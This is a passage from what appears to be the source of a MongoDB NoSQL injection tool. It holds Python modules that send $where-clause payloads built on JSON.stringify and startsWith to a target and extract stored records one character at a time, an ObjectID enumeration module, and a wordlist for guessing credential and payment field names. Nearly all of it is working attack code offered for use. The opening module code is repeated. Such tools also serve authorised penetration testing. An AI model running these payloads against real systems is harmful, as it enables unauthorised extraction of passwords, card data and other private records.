self.entries; 121 | 122 | def grabEntries(self): 123 | self.toGrabInFuture = []; 124 | self.dumpEntry(); 125 | 126 | threads = []; 127 | while len(self.toGrabInFuture) > 0: 128 | var = self.toGrabInFuture.pop(); 129 | self.dumpEntry(var=var,retry=0); 130 | 131 | 132 | def dumpEntry(self,var=[],retry=0): 133 | charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\\ '\"!#$%&._()*+,-/:;<=>?@{|}[]^`~" 134 | i = 0; 135 | while True: 136 | i+= 1; 137 | if i > 500: 138 | bold("".join(var)); 139 | if question("This entry seems abnormally long. Skip it?"): 140 | break; 141 | prev = len(var); 142 | threads = [] 143 | for c in charset: 144 | if len(threads) > self.scanner.maxthreads: 145 | threads.pop().join(); 146 | thread = threading.Thread(target = self.dumpEntryChar, args = (var,c)); 147 | threads.append(thread); 148 | thread.start(); 149 | 150 | for thread in threads: 151 | thread.join(); 152 | 153 | if prev == len(var): 154 | break; 155 | entry = "".join(var).replace("\\\\",'\\').replace("\\\'","'").replace("\\\"",'"'); 156 | if entry == "": 157 | return; 158 | bold("Found an entry: " + entry); 159 | self.entries.append(entry); 160 | 161 | def dumpEntryChar(self,var,c): 162 | try: 163 | speshul = ["\\","'",'"']; 164 | oldVar = copy.deepcopy(var); 165 | oldVarLength = len(var); 166 | if c in speshul: 167 | c = "\\" + c; 168 | condition = "".join(var) + c; 169 | 170 | payload = self.buildPayload(self.options,"; if(JSON.stringify(this)" + self.slice + ".startsWith('" + condition + "')){ return this; }; var dum = "); 171 | data = copy.deepcopy(self.scanner.data); 172 | data[self.param] = payload; 173 | req = self.scanner.sendData(data); 174 | check = self.scanner.check(req); 175 | oldVar.append(c); 176 | if check != "none": 177 | if len(var) == oldVarLength: 178 | var.append(c); 179 | #print(payload); 180 | verbose("".join(var) + "..."); 181 | elif oldVar not in self.toGrabInFuture: 182 | self.toGrabInFuture.append(oldVar); 183 | verbose("Found alternative, will test later: "+"".join(oldVar)); 184 | #info(self.fromVarToString(oldVar) + "."*(length-len(oldVar))); 185 | except Exception as e: 186 | failure(str(e)); 187 | self.dumpEntryChar(var,c); -------------------------------------------------------------------------------- /tests/whereBlindJSONStringifyInjection.py: -------------------------------------------------------------------------------- 1 | import copy; 2 | import difflib; 3 | from util.output import verbose; 4 | from util.output import success; 5 | from util.output import failure; 6 | from util.output import question; 7 | from util.output import info; 8 | from util.output import bold; 9 | 10 | import threading; 11 | from itertools import combinations; 12 | 13 | class WhereBlindJSONStringifyInjection: 14 | def doc(self): 15 | bold("--Description--"); 16 | print("Attempts to exploit a one liner where check in a mongodb injection point to gather \ 17 | data via blind injection. Uses JSONStringify to get json objects in the form of strings."); 18 | print(""); 19 | bold("--How it works--"); 20 | print("The target must be using a '$where' check that is only a one liner. Example:"); 21 | print("$where: \"this.username == '\".$_POST[\"username\"].\"'\""); 22 | print("This module will use JSONStringify and startsWith to gather data. Payloads look like these:"); 23 | print("' || JSON.stringify(this).startsWith('\"') && '' == '"); 24 | print("' || JSON.stringify(this).startsWith('\"u') && '' == '"); 25 | print("' || JSON.stringify(this).startsWith('\"us') && '' == '"); 26 | print("' || JSON.stringify(this).startsWith('\"use') && '' == '"); 27 | print("' || JSON.stringify(this).startsWith('\"user') && '' == '"); 28 | print("' || JSON.stringify(this).startsWith('\"usern') && '' == '"); 29 | print("If a difference in webpage content, status or cookies is detected, \ 30 | this module will be able to extract values one letter at a time until a whole value is found."); 31 | bold("--Output--"); 32 | print("This module will output any values it can steal via this method."); 33 | bold("--Extra Notes--"); 34 | print(".slice(42,-01) is added if you want to omit ObjectID dumping. It will speed up the module \ 35 | significantly, since objectIDs are pretty long. You can still dump objectIDs by answering the console prompt"); 36 | print("Like whereAlwaysTrueFunctionInjection, the trailing and leading quotes are added and removed \ 37 | to test automatically for different injection points."); 38 | print("This module will fail to find some results in slow network conditions. If you only get 1 entry, \ 39 | it is recommended to rerun this module."); 40 | print("This may have some false positives if the target is also vulnerable to whereAlwaysTrueFunctionInjection."); 41 | print("Setting maxthreads beyond a certain limit does not increase the speed of this module. Feel free to \ 42 | set maxthreads as high as you want."); 43 | 44 | def getID(self): 45 | return 5; 46 | 47 | def getType(self): 48 | return "w"; 49 | def __init__(self,url,param,scanner): 50 | self.url = url; 51 | self.param = param; 52 | self.scanner = scanner; 53 | self.options = {'q':"'","front":True,"back":True}; 54 | #q, quote to use 55 | #front, if payload must start with quote 56 | #back, if payload must end with quote 57 | self.toGrabInFuture = []; 58 | self.entries = []; 59 | self.slice = ".slice(43,-1)"; 60 | 61 | def vulnTest(self): 62 | failPayl = "\\"; 63 | data = copy.deepcopy(self.scanner.data); 64 | data[self.param] = failPayl; 65 | self.scanner.textErrorBaseline = self.scanner.sendData(data).text; 66 | 67 | if self.scanner.textErrorBaseline != self.scanner.textBaseline: 68 | success("Basic check succeeded!"); 69 | else: 70 | bold("Basic check failed. The rest of this module may not work."); 71 | 72 | for options in self.getAllOptions(): 73 | verbose("Testing with: " + str(options)); 74 | data = copy.deepcopy(self.scanner.data); 75 | data[self.param] = self.buildPayload(options," || JSON.stringify(this).startsWith('{') && '' == "); 76 | req = self.scanner.sendData(data); 77 | if req.text != self.scanner.textErrorBaseline: 78 | self.options = options; 79 | success("Error-based content check worked!"); 80 | success("Payload built!"); 81 | return True; 82 | return False; 83 | 84 | def getAllOptions(self): 85 | allOptions = [{'q':"'","front":True,"back":True},\ 86 | {'q':"'","front":False,"back":True},\ 87 | {'q':"'","front":True,"back":False},\ 88 | {'q':"'","front":False,"back":False},\ 89 | {'q':"\"","front":True,"back":True},\ 90 | {'q':"\"","front":False,"back":True},\ 91 | {'q':"\"","front":True,"back":False},\ 92 | {'q':"\"","front":False,"back":False},\ 93 | ]; 94 | return allOptions; 95 | 96 | def buildPayload(self,options,payload): 97 | q = options["q"]; 98 | reverseQuotes = '"'; 99 | if q == '"': 100 | reverseQuotes = "'"; 101 | front = options["front"]; 102 | back = options["back"]; 103 | #payload = payload.replace("'",q); 104 | #payload = payload.replace("\\\"",reverseQuotes); 105 | if front: 106 | payload = q + payload; 107 | 108 | payload += q; 109 | if back: 110 | payload += q; 111 | 112 | return payload; 113 | 114 | def grabData(self): 115 | bold("Be warned that this module may take some time to retrieve output."); 116 | if not question("Omit ObjectID from dump? (Faster)"): 117 | self.slice = ""; 118 | self.grabEntries(); 119 | if len(self.entries) == 0: 120 | failure("Failed to fetch any entries."); 121 | return None; 122 | return ["Found Entries:"] + self.entries; 123 | 124 | def grabEntries(self): 125 | self.toGrabInFuture = []; 126 | self.dumpEntry(); 127 | 128 | threads = []; 129 | while len(self.toGrabInFuture) > 0: 130 | var = self.toGrabInFuture.pop(); 131 | self.dumpEntry(var=var,retry=0); 132 | 133 | 134 | def dumpEntry(self,var=[],retry=0): 135 | charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\\ '\"!#$%&._()*+,-/:;<=>?@{|}[]^`~" 136 | i = 0; 137 | while True: 138 | i+= 1; 139 | if i > 500: 140 | bold("".join(var)); 141 | if question("This entry seems abnormally long. Skip it?"): 142 | break; 143 | prev = len(var); 144 | threads = [] 145 | for c in charset: 146 | if len(threads) > self.scanner.maxthreads: 147 | threads.pop().join(); 148 | thread = threading.Thread(target = self.dumpEntryChar, args = (var,c)); 149 | threads.append(thread); 150 | thread.start(); 151 | 152 | for thread in threads: 153 | thread.join(); 154 | 155 | if prev == len(var): 156 | break; 157 | entry = "".join(var).replace("\\\\",'\\').replace("\\\'","'").replace("\\\"",'"'); 158 | if entry != "": 159 | bold("Found an entry: " + entry); 160 | self.entries.append(entry); 161 | else: 162 | failure("Failed to fetch an entry. Maybe it was a false positive or internet delay?"); 163 | 164 | def dumpEntryChar(self,var,c): 165 | try: 166 | speshul = ["\\","'",'"']; 167 | oldVar = copy.deepcopy(var); 168 | oldVarLength = len(var); 169 | if c in speshul: 170 | c = "\\" + c; 171 | condition = "".join(var) + c; 172 | 173 | payload = self.buildPayload(self.options," || JSON.stringify(this)" + self.slice + ".startsWith('" + condition + "') && '' == "); 174 | 175 | data = copy.deepcopy(self.scanner.data); 176 | data[self.param] = payload; 177 | req = self.scanner.sendData(data); 178 | check = self.scanner.check(req); 179 | oldVar.append(c); 180 | if check != "none": 181 | if len(var) == oldVarLength: 182 | #failure("Added "+c); 183 | var.append(c); 184 | #print(payload); 185 | verbose("".join(var) + "..."); 186 | elif oldVar not in self.toGrabInFuture: 187 | self.toGrabInFuture.append(oldVar); 188 | verbose("Found alternative, will test later: "+"".join(oldVar)); 189 | #info(self.fromVarToString(oldVar) + "."*(length-len(oldVar))); 190 | except Exception as e: 191 | failure(str(e)); 192 | self.dumpEntryChar(var,c); -------------------------------------------------------------------------------- /tests/whereObjectIDEnumerationBlindInjection.py: -------------------------------------------------------------------------------- 1 | import copy; 2 | import difflib; 3 | from util.output import verbose; 4 | from util.output import success; 5 | from util.output import failure; 6 | from util.output import question; 7 | from util.output import info; 8 | from util.output import bold; 9 | 10 | import threading; 11 | from itertools import combinations; 12 | 13 | class WhereObjectIDEnumerationBlindInjection: 14 | def doc(self): 15 | bold("--Description--"); 16 | print("This module is an abandoned technique that was made inferior due to JSONStringify."); 17 | print("It works by attempting to retrieve objectIDs via startsWith checks. It will then use these\ 18 | IDs to try and gather ID-related data. This method was much slower due to how long it took to\ 19 | gather object IDs"); 20 | 21 | def getID(self): 22 | return -1; 23 | 24 | def getType(self): 25 | return "w"; 26 | def __init__(self,url,param,scanner): 27 | self.url = url; 28 | self.param = param; 29 | self.scanner = scanner; 30 | self.options = {'q':"'","front":True,"back":True}; 31 | #q, quote to use 32 | #front, if payload must start with quote 33 | #back, if payload must end with quote 34 | self.keyAttribute = ""; 35 | self.toGrabInFuture = []; 36 | self.objectIDs = []; 37 | 38 | def vulnTest(self): 39 | failPayl = "\\"; 40 | data = copy.deepcopy(self.scanner.data); 41 | data[self.param] = failPayl; 42 | self.scanner.textErrorBaseline = self.scanner.sendData(data).text; 43 | 44 | if self.scanner.textErrorBaseline != self.scanner.textBaseline: 45 | success("Basic check succeeded!"); 46 | else: 47 | bold("Basic check failed. The rest of this module may not work."); 48 | 49 | for options in self.getAllOptions(): 50 | verbose("Testing with: " + str(options)); 51 | data = copy.deepcopy(self.scanner.data); 52 | data[self.param] = self.buildPayload(options," || '' == '"); 53 | req = self.scanner.sendData(data); 54 | if req.text != self.scanner.textErrorBaseline: 55 | self.options = options; 56 | verbose("Error-based content check worked!"); 57 | return True; 58 | 59 | return False; 60 | 61 | def getAllOptions(self): 62 | allOptions = [{'q':"'","front":True,"back":True},\ 63 | {'q':"'","front":False,"back":True},\ 64 | {'q':"'","front":True,"back":False},\ 65 | {'q':"'","front":False,"back":False},\ 66 | {'q':"\"","front":True,"back":True},\ 67 | {'q':"\"","front":False,"back":True},\ 68 | {'q':"\"","front":True,"back":False},\ 69 | {'q':"\"","front":False,"back":False},\ 70 | ]; 71 | return allOptions; 72 | 73 | def buildPayload(self,options,payload): 74 | q = options["q"]; 75 | reverseQuotes = '"'; 76 | if q == '"': 77 | reverseQuotes = "'"; 78 | front = options["front"]; 79 | back = options["back"]; 80 | payload = payload.replace("'",q); 81 | payload = payload.replace("\\\"",reverseQuotes); 82 | if front: 83 | payload = q + payload; 84 | 85 | if back: 86 | payload += q; 87 | 88 | return payload; 89 | 90 | def grabData(self): 91 | if len(self.scanner.element_attributes) > 0: 92 | if question("There are already some found attributes. Do you want to find again with this module?"): 93 | self.grabElementAttributes(); 94 | else: 95 | self.grabElementAttributes(); 96 | 97 | if len(self.scanner.element_attributes) > 0: 98 | success("Some attributes are present. We can proceed to step 2."); 99 | bold("Attributes to be used:"); 100 | for attribute in self.scanner.element_attributes: 101 | bold("- " + attribute); 102 | else: 103 | failure("No attributes could be found. We cannot dump anything."); 104 | return None; 105 | 106 | 107 | if len(self.scanner.objectIDs) > 0: 108 | if question("There are already some found IDs. Do you want to find again with this module?"): 109 | self.grabIDs(); 110 | else: 111 | self.grabIDs(); 112 | 113 | if len(self.scanner.objectIDs) == 0: 114 | failure("No IDs found. Database may be empty."); 115 | return None; 116 | 117 | if len(self.scanner.objectIDs) > 0: 118 | success("Some ObjectIDs are present. Proceeding with step 3."); 119 | 120 | grabbedData = {}; 121 | for objectID in self.scanner.objectIDs: 122 | dump = self.grabDataFromID(objectID); 123 | grabbedData[objectID] = dump; 124 | 125 | output = []; 126 | for id in grabbedData: 127 | output.append(id); 128 | dump = grabbedData[id]; 129 | for attrib in dump: 130 | value = dump[attrib]["value"]; 131 | output.append("\t" + attrib + " : " + str(value)); 132 | 133 | return ["Element Attributes:"] + self.scanner.element_attributes + ["","Object IDs:"] + self.objectIDs; 134 | 135 | def grabDataFromID(self,objectID): 136 | dump = {}; 137 | for attribute in self.scanner.element_attributes: 138 | if attribute == "_id": 139 | continue; 140 | length = -1; 141 | value = None; 142 | try: 143 | testLength = 0; 144 | bold("Attempting to retrieve length of " + attribute + " for ID " + objectID); 145 | while length == -1: 146 | testLength += 1; 147 | if testLength == 70: 148 | if question("The length seems unnaturally long. Skip this attribute?"): 149 | break; 150 | regex = "^"+"."*testLength+"$"; 151 | payload = self.buildPayload(self.options," || this." + attribute + ".toString().match(\\\"" + regex + "\\\") && this._id.str == '" + objectID); 152 | data = copy.deepcopy(self.scanner.data); 153 | data[self.param] = payload; 154 | req = self.scanner.sendData(data); 155 | check = self.scanner.check(req); 156 | if check != "none": 157 | length = testLength; 158 | success("Retrieved length " + str(testLength) + " for " + attribute + " for ID " + objectID); 159 | 160 | except Exception as e: 161 | print(e); 162 | failure("Failed to retrieve exact length for " + attribute + " for ID " + objectID); 163 | 164 | try: 165 | if length == -1: 166 | failure("Failed to retrieve " + attribute + " for ID " + objectID); 167 | continue; 168 | 169 | bold("Attempting to retrieve value of " + attribute + " for ID " + objectID); 170 | 171 | 172 | 173 | except Exception as e: 174 | print(e); 175 | failure("Failed to retrieve value of " + attribute + " for ID " + objectID); 176 | 177 | dump[attribute] = {"length":length,"value":value}; 178 | return dump; 179 | 180 | 181 | def grabIDs(self): 182 | 183 | if "_id" not in self.scanner.element_attributes: 184 | #All elements MUST have _id. If this was not found, then this probably wasn't an element. 185 | failure("_id was not one of the found attributes. Cannot dump."); 186 | else: 187 | self.keyAttribute = "_id"; 188 | bold("Using " + self.keyAttribute + " as a unique key."); 189 | 190 | self.toGrabInFuture = []; 191 | self.dumpIDValue(); 192 | 193 | threads = []; 194 | while len(self.toGrabInFuture) > 0: 195 | var = self.toGrabInFuture.pop(); 196 | self.dumpIDValue(var=var,retry=5); 197 | 198 | for id in self.objectIDs: 199 | if id not in self.scanner.objectIDs: 200 | success("New ObjectID: " + id); 201 | self.scanner.objectIDs.append(id); 202 | else: 203 | bold("Re-confirmed id: " + id); 204 | 205 | 206 | def dumpIDValue(self,var=[],retry=0): 207 | charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\\!#$%&._()*+,-/:;<=>?@{|}[]^`~" 208 | 209 | while len(var) < 24: 210 | prev = len(var); 211 | threads = [] 212 | for c in charset: 213 | if len(threads) > self.scanner.maxthreads: 214 | threads.pop().join(); 215 | thread = threading.Thread(target = self.dumpIDChar, args = (var,c)); 216 | threads.append(thread); 217 | thread.start(); 218 | 219 | for thread in threads: 220 | thread.join(); 221 | 222 | if prev == len(var): 223 | failure("Something went wrong."); 224 | if retry < 10: 225 | self.dumpIDValue(var,retry+1); 226 | bold("Found an ObjectID: " + "".join(var)); 227 | self.objectIDs.append("".join(var)); 228 | 229 | def dumpIDChar(self,var,c): 230 | length = 24; 231 | try: 232 | speshul = self.options["q"]+"\\"; 233 | oldVar = copy.deepcopy(var); 234 | oldVarLength = len(var); 235 | condition = "".join(var) + c; 236 | if c in speshul: 237 | condition = "".join(var) + "\\" + c; 238 | 239 | payload = self.buildPayload(self.options," || this._id.str.startsWith(\\\"" + condition + "\\\") && '' == '"); 240 | data = copy.deepcopy(self.scanner.data); 241 | data[self.param] = payload; 242 | req = self.scanner.sendData(data); 243 | check = self.scanner.check(req); 244 | oldVar.append(c); 245 | if check != "none": 246 | if len(var) == oldVarLength: 247 | #failure("Added "+c); 248 | var.append(c); 249 | 250 | verbose("".join(var) + "."*(length-len(var))); 251 | elif oldVar not in self.toGrabInFuture: 252 | self.toGrabInFuture.append(oldVar); 253 | verbose("Found alternative, will test later: "+"".join(oldVar)); 254 | #info(self.fromVarToString(oldVar) + "."*(length-len(oldVar))); 255 | except Exception as e: 256 | failure(str(e)); 257 | self.dumpIDChar(var,c); 258 | 259 | def retrieveLengths(self,maxLength,attribute): 260 | lengths = []; 261 | for length in range(1,maxLength+1): 262 | try: 263 | regex = "^"+"."*length+"$"; 264 | payload = self.buildPayload(self.options," || this." + attribute + ".toString().match(\\\"" + regex + "\\\") && '' == '"); 265 | data = copy.deepcopy(self.scanner.data); 266 | data[self.param] = payload; 267 | req = self.scanner.sendData(data); 268 | check = self.scanner.check(req); 269 | if check != "none": 270 | lengths.append(length); 271 | success("Retrieved length " + str(length)); 272 | except Exception as e: 273 | print(e); 274 | failure("Failed to retrieve exact length."); 275 | return lengths; 276 | return lengths; 277 | 278 | def retrieveMaxLength(self,attribute): 279 | try: 280 | length = 1; 281 | 282 | payload = self.buildPayload(self.options," || this." + attribute + ".toString().match(\\\".{" + str(length) + "}\\\") && '' == '"); 283 | 284 | data = copy.deepcopy(self.scanner.data); 285 | data[self.param] = payload; 286 | req = self.scanner.sendData(data); 287 | 288 | while self.scanner.check(req) != "none": 289 | if length == 70: 290 | if question("Length abnormally long. Do you want to terminate the program?"): 291 | return -1; 292 | length += 1; 293 | payload = self.buildPayload(self.options," || this." + attribute + ".toString().match(\".{" + str(length) + "}\") && '' == '"); 294 | data = copy.deepcopy(self.scanner.data); 295 | data[self.param] = payload; 296 | req = self.scanner.sendData(data); 297 | 298 | success("Retrieved max length: " + str(length-1)); 299 | return length-1; 300 | except Exception as e: 301 | print(e); 302 | failure("Failed to retrieve max length."); 303 | return -1; 304 | 305 | #Get a list of element attributes. 306 | def grabElementAttributes(self): 307 | if len(self.scanner.element_attributes) > 0: 308 | if not question("There were some element attributes previously found. Try finding attributes again?"): 309 | return; 310 | bold("A bruteforce method is being used to recover columns. This may take a while."); 311 | 312 | 313 | file = open("txt/common-columns.txt","r"); 314 | common = file.read().strip().split("\n"); 315 | file.close(); 316 | 317 | threads = []; 318 | newAttributes = []; 319 | tried = 0; 320 | for attribute in common: 321 | tried += 1; 322 | if tried > self.scanner.maxbrute and self.scanner.maxbrute != 0: 323 | info("Tested for " + str(self.scanner.maxbrute) + " attributes out of " + str(len(common)) + ". Use the -maxbrute flag to increase the number of tests."); 324 | break; 325 | if len(threads) > self.scanner.maxthreads: 326 | threads.pop().join(); 327 | verbose("Trying attribute " + attribute); 328 | thread = threading.Thread(target = self.tryElementAttribute, args= (attribute,newAttributes)); 329 | threads.append(thread); 330 | thread.start(); 331 | 332 | for thread in threads: 333 | thread.join(); 334 | 335 | for attribute in newAttributes: 336 | self.scanner.element_attributes.append(attribute); 337 | 338 | #Try for a particular element attribute 339 | def tryElementAttribute(self,attribute,newAttributes,retry=0): 340 | if retry > 10: 341 | failure("Failed to connect to target 10 times! Consider killing the program."); 342 | return; 343 | try: 344 | 345 | payload = self.buildPayload(self.options," || this." + attribute + ".toString().match(/.*/) && '' == '"); 346 | data = copy.deepcopy(self.scanner.data); 347 | data[self.param] = payload; 348 | req = self.scanner.sendData(data); 349 | 350 | if req.text != self.scanner.textErrorBaseline: 351 | if attribute not in self.scanner.element_attributes: 352 | newAttributes.append(attribute); 353 | success("Found an element attribute: " + attribute); 354 | else: 355 | info("Element attribute: " + attribute + " reconfirmed."); 356 | except: 357 | self.tryElementAttribute(atrribute,newAttributes,retry+1); 358 | -------------------------------------------------------------------------------- /txt/common-columns.txt: -------------------------------------------------------------------------------- 1 | _id 2 | id 3 | name 4 | password 5 | user_id 6 | description 7 | username 8 | user 9 | pass 10 | pwd 11 | customers_email_address 12 | customers_password 13 | user_password 14 | user_pass 15 | admin_user 16 | admin_password 17 | admin_pass 18 | usern 19 | user_n 20 | users 21 | login 22 | logins 23 | login_user 24 | login_admin 25 | login_username 26 | user_username 27 | user_login 28 | auid 29 | apwd 30 | adminid 31 | admin_id 32 | adminuser 33 | adminuserid 34 | admin_userid 35 | adminusername 36 | admin_username 37 | adminname 38 | admin_name 39 | usr 40 | usr_n 41 | usrname 42 | usr_name 43 | usrpass 44 | usr_pass 45 | usrnam 46 | administrator 47 | administrator_name 48 | mem_login 49 | login_password 50 | login_pass 51 | login_passwd 52 | login_pwd 53 | psw 54 | pass1word 55 | pass_word 56 | passw 57 | pass_w 58 | user_passwd 59 | userpass 60 | userpassword 61 | userpwd 62 | user_pwd 63 | useradmin 64 | user_admin 65 | mypassword 66 | passwrd 67 | admin_pwd 68 | admin_passwd 69 | mem_password 70 | memlogin 71 | nc 72 | myusername 73 | mail 74 | type 75 | title 76 | userid 77 | group_id 78 | first_name 79 | itemid 80 | category_id 81 | flag 82 | firstname 83 | code 84 | creditcard_id 85 | card_id 86 | hostid 87 | table_name 88 | cid 89 | email 90 | smtp_helo 91 | platformid 92 | dept_id 93 | album_id 94 | key_ 95 | uid 96 | nextval 97 | pno 98 | the 99 | child_cfg 100 | jid 101 | platform 102 | expression 103 | functionid 104 | smtp_server 105 | clock 106 | alarmid 107 | alertid 108 | private_key 109 | actionid 110 | triggerid 111 | triggertemplateid 112 | local_spi 113 | delay 114 | sid 115 | mediaid 116 | peer_cfg 117 | smtp_email 118 | order_id 119 | shared_secret 120 | itemtemplateid 121 | certificate 122 | insertid 123 | role_id 124 | song_id 125 | item_id 126 | product_id 127 | blob_id 128 | distip 129 | artist_id 130 | empno 131 | customer_name 132 | grade 133 | branch_name 134 | portal_id 135 | deptno 136 | data 137 | rid 138 | app_id 139 | class 140 | loan_number 141 | countryid 142 | enabled 143 | fname 144 | country 145 | ename 146 | object_id 147 | idtype 148 | groupid 149 | rowid 150 | accno 151 | account_number 152 | event 153 | passwd 154 | sequence_id 155 | datarow 156 | owner_id 157 | display 158 | pid 159 | venue 160 | locked 161 | eno 162 | serviceid 163 | alias 164 | categoryid 165 | canoccupantsinvite 166 | keyword 167 | channel_id 168 | loginrestrictedtonickname 169 | registrationenabled 170 | logenabled 171 | ip 172 | maxnumber 173 | tag_id 174 | alert_id 175 | cananyonediscoverjid 176 | address 177 | sumdatarow 178 | emp_id 179 | ono 180 | anyone 181 | surname 182 | subdomain 183 | maxusers 184 | ccc 185 | datacol 186 | os 187 | status_id 188 | node_id 189 | essn 190 | last_name 191 | iteration 192 | canchangenickname 193 | canoccupantschangesubject 194 | membersonly 195 | created_by 196 | succ_rate 197 | dnumber 198 | service_id 199 | mid 200 | publicroom 201 | propvalue 202 | empty_days 203 | moderated 204 | customer_id 205 | wdatarow 206 | persistent 207 | authorid 208 | patch_status_id 209 | submitted_by 210 | resolution_id 211 | osvendor 212 | routeid 213 | arch 214 | fid 215 | assigned_to 216 | ns 217 | event_id 218 | problem_code 219 | city 220 | note 221 | channel 222 | element_id 223 | cat_id 224 | position_id 225 | schema_id 226 | area 227 | bug_category_id 228 | session_id 229 | project_id 230 | random 231 | nsprefix 232 | archive_id 233 | nsschema 234 | view_id 235 | pname 236 | bug_group_id 237 | lastname 238 | link_id 239 | langid 240 | catname 241 | bug_id 242 | magic_string 243 | m_id 244 | zip 245 | patch_category_id 246 | custno 247 | idcountry 248 | stopid 249 | identifier 250 | category 251 | isbn 252 | group_project_id 253 | extension_id 254 | state 255 | page 256 | extension 257 | spellid 258 | dno 259 | instanceof 260 | network 261 | priority 262 | aname 263 | person_id 264 | ncbofile 265 | student_number 266 | term_id 267 | uno 268 | path_id 269 | aid 270 | location_id 271 | propertyno 272 | course_number 273 | tid 274 | langug_code 275 | variable 276 | dept_desc 277 | orderno 278 | ownerno 279 | partof 280 | clientno 281 | white 282 | macaddr 283 | jobtypeid 284 | direction 285 | md5sum 286 | orga_id 287 | parentcategoryid 288 | beginstateid 289 | mname 290 | qno 291 | src 292 | featurename 293 | client_id 294 | route_id 295 | ticker 296 | version 297 | modulename 298 | maty_id 299 | currentstateid 300 | userinfo_id 301 | column_id 302 | imageinfo_id 303 | staffno 304 | lid 305 | metadatainfoid 306 | context 307 | app_title 308 | dest 309 | attributecategory_id 310 | operation_type 311 | dnum 312 | pers_id_registerer 313 | datasource 314 | connectorid 315 | our_loc 316 | country_name 317 | dname 318 | capital 319 | search_id 320 | statechangeid 321 | rightid 322 | endstateid 323 | distconnectorid 324 | walnut 325 | distmacaddr 326 | pixsize 327 | jobid 328 | revid 329 | match_cid 330 | branchno 331 | prepend_digits 332 | stockno 333 | ncbofileid 334 | object_type 335 | type_id 336 | pubid 337 | qagent 338 | office 339 | db_name 340 | bank 341 | dummy 342 | storyname 343 | col 344 | petty 345 | qname 346 | store_id 347 | inv_id 348 | inventory 349 | gift 350 | cno 351 | item 352 | c_sec_id 353 | row_id 354 | price 355 | loc_id 356 | ssn 357 | c_id 358 | sname 359 | parent 360 | allowance 361 | color 362 | group_name 363 | accounts 364 | vendorid 365 | gifi_accno 366 | movie_id 367 | rate 368 | company 369 | subid 370 | commentpath 371 | protocol_action_id 372 | topic_id 373 | s_id 374 | config_id 375 | long 376 | link 377 | copyright 378 | vehicle 379 | customerid 380 | customer 381 | f_id 382 | chart_id 383 | url 384 | host 385 | loans 386 | charttype 387 | imagefile 388 | data_set_id 389 | guest_ip 390 | biosample_id 391 | affiliation_id 392 | os_id 393 | street_id 394 | book_code 395 | object_name 396 | start_date 397 | form_id 398 | itemno 399 | provincial 400 | confid 401 | ratingid 402 | drinker 403 | qname_id 404 | whatsdom 405 | config_name 406 | ship_id 407 | investigator_id 408 | smilies_id 409 | cal_id 410 | license_id 411 | conf 412 | contact_id 413 | procedure_id 414 | column_name 415 | chromosome_id 416 | tf_key 417 | agent_specialtyid 418 | users_id 419 | gid 420 | publisher_code 421 | setting 422 | format_id 423 | word 424 | slogan 425 | superssn 426 | product 427 | referredby 428 | operationid 429 | ban_ip 430 | p_id 431 | lbl_aom_unaccessible_shipmethod 432 | origin 433 | comment_id 434 | product_version 435 | probe_id 436 | orderdate 437 | ordernumber 438 | data_type_id 439 | publisherid 440 | lake_id 441 | course_id 442 | questionid 443 | student_id 444 | user_name 445 | answerid 446 | hashtag 447 | preference_id 448 | author_num 449 | branch_num 450 | derived_id 451 | factoryid 452 | filterid 453 | log 454 | pnumber 455 | specialtyid 456 | plugin_id 457 | aa 458 | file 459 | dept_number 460 | action_attribute_id 461 | cpr 462 | storeid 463 | progenitor_id 464 | staff_number 465 | deptid 466 | semester 467 | poi_id 468 | part_id 469 | cell_line_id 470 | transaction_id 471 | agentid 472 | regionid 473 | token 474 | serial_no 475 | experimental_data_set_id 476 | cp_id 477 | the_geom 478 | model 479 | o_id 480 | personid 481 | display_name 482 | salesperson_id 483 | dependent_name 484 | license 485 | tablename 486 | employee_id 487 | e_id 488 | id_group 489 | location 490 | bb 491 | languageid 492 | int4 493 | msg_id 494 | department 495 | book_id 496 | ingredientid 497 | action_type_id 498 | maker 499 | app 500 | id_customer 501 | this 502 | entry_id 503 | county_id 504 | protocol_type_id 505 | empnbr 506 | unit_number 507 | bar 508 | studentid 509 | dbid 510 | title_id 511 | cname 512 | emp_num 513 | owner 514 | course_name 515 | editionnumber 516 | sessionid 517 | mealid 518 | com_id 519 | text 520 | chip_layout_id 521 | watchlistid 522 | qty 523 | data_set_type_id 524 | orderid 525 | module_id 526 | c1 527 | dlocation 528 | domainid 529 | course_no 530 | mgrssn 531 | id_log 532 | access_control_type_id 533 | account_id 534 | checking 535 | protocol_id 536 | request_id 537 | settingsid 538 | lname 539 | sale_date 540 | module_addr 541 | usuario 542 | nombre 543 | contrasena 544 | consumidor 545 | clave 546 | tecla 547 | llave 548 | chaveta 549 | tono 550 | cuna 551 | benutzername 552 | benutzer 553 | passwort 554 | kennwort 555 | parole 556 | losungswort 557 | losung 558 | kennung 559 | motto 560 | stichwort 561 | schlusselwort 562 | utilisateur 563 | usager 564 | consommateur 565 | nom 566 | mot 567 | passe 568 | cle 569 | touche 570 | clef 571 | utente 572 | nome 573 | utilizzatore 574 | parola 575 | chiave 576 | tasto 577 | pulsante 578 | chiavetta 579 | cifrario 580 | usufrutuario 581 | chave 582 | cavilha 583 | korisnik 584 | sifra 585 | lozinka 586 | kljuc 587 | emni 588 | logohu 589 | punonjes 590 | kpro_user 591 | wp_users 592 | emniplote 593 | perdoruesi 594 | perdorimi 595 | punetoret 596 | logini 597 | llogaria 598 | fjalekalimin 599 | kodi 600 | emer 601 | ime 602 | korisnici 603 | user1 604 | e_mail 605 | usrn 606 | u_name 607 | uname 608 | mempassword 609 | mem_pass 610 | mem_passwd 611 | mem_pwd 612 | p_word 613 | pword 614 | p_assword 615 | myname 616 | my_username 617 | my_name 618 | my_password 619 | my_email 620 | cvvnumber 621 | about 622 | access 623 | accnt 624 | accnts 625 | account 626 | admin 627 | adminemail 628 | adminlogin 629 | adminmail 630 | admins 631 | aim 632 | auth 633 | authenticate 634 | authentication 635 | blog 636 | cc_expires 637 | cc_owner 638 | cc_type 639 | cfg 640 | clientname 641 | clientpassword 642 | clientusername 643 | config 644 | contact 645 | converge_pass_hash 646 | converge_pass_salt 647 | crack 648 | customers 649 | cvvnumber] 650 | db_database_name 651 | db_hostname 652 | db_password 653 | db_username 654 | download 655 | e-mail 656 | emailaddress 657 | full 658 | group 659 | hash 660 | hashsalt 661 | homepage 662 | icq 663 | icq_number 664 | id_member 665 | images 666 | index 667 | ip_address 668 | last_ip 669 | last_login 